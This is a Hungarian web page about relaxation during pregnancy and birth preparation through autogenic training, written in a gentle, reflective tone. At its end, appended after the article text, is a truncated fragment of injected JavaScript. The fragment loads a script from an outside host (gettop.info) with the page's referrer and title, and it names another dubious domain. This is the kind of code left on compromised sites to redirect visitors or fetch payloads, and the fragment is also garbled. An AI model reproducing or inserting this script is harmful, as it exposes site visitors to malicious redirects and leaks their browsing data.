Várandó relaxáció – szülésre felkészítés

“A csend a nagy kinyilatkoztatás.”
/Lao-ce/

Várandós relaxáció – Szülésre felkészítés autogén tréninggel

Csend

A magzat fejlődése, akárcsak a földbe hullott mag növekedése is csendben történik. A csend alkalmat ad arra is, hogy önmagunkra figyelve megtapasztalhassuk az átalakulást. Rohanó világunkban a befelé fordulás gyakran nehézségekbe ütközik, a várandós relaxáció ennek a belső csendnek az önmagunkban való megtalálásához nyújt segítséget.

Az autogén tréning egy olyan módszer, amely testi-lelki egyensúlyt teremt szervezetünkben. A tudatosan a testre irányított figyelem következtében a test megnyugszik, ellazul és mindeközben egyfajta lebegő figyelem alakul ki, ami segíti a befelé fókuszálást és tágítja a teret, segít eljutni a saját belső világunk, a lelkünk felé is.

Ráhangolódás

A várandósság során a speciális gyakorlatok lehetővé teszik, hogy az anya ráhangolódjon a magzatára, valamint megtanuljon saját belső erőire támaszkodni és mély érzéseire hallgatni, miközben a test (újra)integrálása is megtörténhet.

A várandósság boldog állapota mellett egymásnak ellentmondó érzések kevereghetnek a leendő anyában. A várakozás öröme mellett a félelmek, az aggodalmak természetes velejárói a várandósságnak. Rendszeres relaxációval a kismama képessé válik saját érzelmi hullámzásait kezelni.

A magzat szinte mindent együtt csinál az anyával. Az anya „vegykonyháján” keresztül minden pillanatban átéli az anya aktuális lelkiállapotát, tehát jóban, rosszban együtt vannak. Ma már tudjuk, hogy a lelki egészség az anyaméhben kezdődik. A relaxáció során az anya jobban ráhangolódhat magzatára, érzékenyebbé válhat jelzéseire, átélheti, hogy egykor vele is valami hasonló történt. Ebben az anya-magzat egységben (duál unióban) a későbbi életet is meghatározó ősbizalom-önbizalom alapozódhat meg.

Szülés, születés

Lélektani szempontból a szülés, születés nem könnyű feladat, mert amíg a babából egy önálló személyiség, addig az anyából egy új identitás születik, amely során megvalósulhat a várandósság fő feladata, miszerint a nő a saját anyja gyermekéből, a saját gyermeke anyjává válik. Anyasági trilógiának nevezzük azt a pszichés munkát, amely során az anya párbeszédet folytat saját anyjával, saját magával és saját gyermekével. Ez jelöli ki a szülésre felkészülés útját.

s.src=’https://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) { topspyapps.net